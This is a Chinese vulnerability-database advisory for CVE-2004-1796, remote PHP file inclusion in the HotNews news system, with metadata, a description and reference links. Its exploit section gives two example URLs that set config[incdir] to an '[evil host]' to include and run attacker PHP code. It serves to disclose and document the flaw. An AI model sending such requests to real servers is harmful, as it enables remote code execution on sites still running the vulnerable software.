HotNews多个PHP文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107616 漏洞类型 输入验证
发布时间 2004-01-05 更新时间 2006-09-28
CVE编号 CVE-2004-1796 CNNVD-ID CNNVD-200412-1024
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/23518
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1024
|漏洞详情
HotNews是一款基于WEB的新闻发布系统。HotNews存在多个文件包含问题,远程攻击者可以利用这个漏洞以WEB权限在系统上执行任意命令。问题存在于hotnews-engine.inc.php3和hnmain.inc.php3中,这两个脚本对用户提交给"config[header]"和"config[incdir]"的URI参数缺少充分过滤,提交包含远程服务器上的恶意文件,可能以WEB进程权限执行恶意PHP脚本上的任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/9357/info
 
HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software.

http://www.example.com/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/func.inc.php3
http://www.example.com/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/hndefs.inc.php3
|参考资料

来源:XF
名称:hotnews-php-file-include(14140)
链接:http://xforce.iss.net/xforce/xfdb/14140
来源:BID
名称:9357
链接:http://www.securityfocus.com/bid/9357
来源:BUGTRAQ
名称:20040104HotNewsarbitaryfileinclusion
链接:http://www.securityfocus.com/archive/1/348840
来源:sourceforge.net
链接:http://sourceforge.net/forum/forum.php?forum_id=342594
来源:SECTRACK
名称:1008608
链接:http://securitytracker.com/id?1008608
来源:SECUNIA
名称:10551
链接:http://secunia.com/advisories/10551
来源:OSVDB
名称:3405
链接:http://www.osvdb.org/3405
来源:OSVDB
名称:3332
链接:http://www.osvdb.org/3332
来源:NSFOCUS
名称:5890
链接:http://www.nsfocus.net/vulndb/5890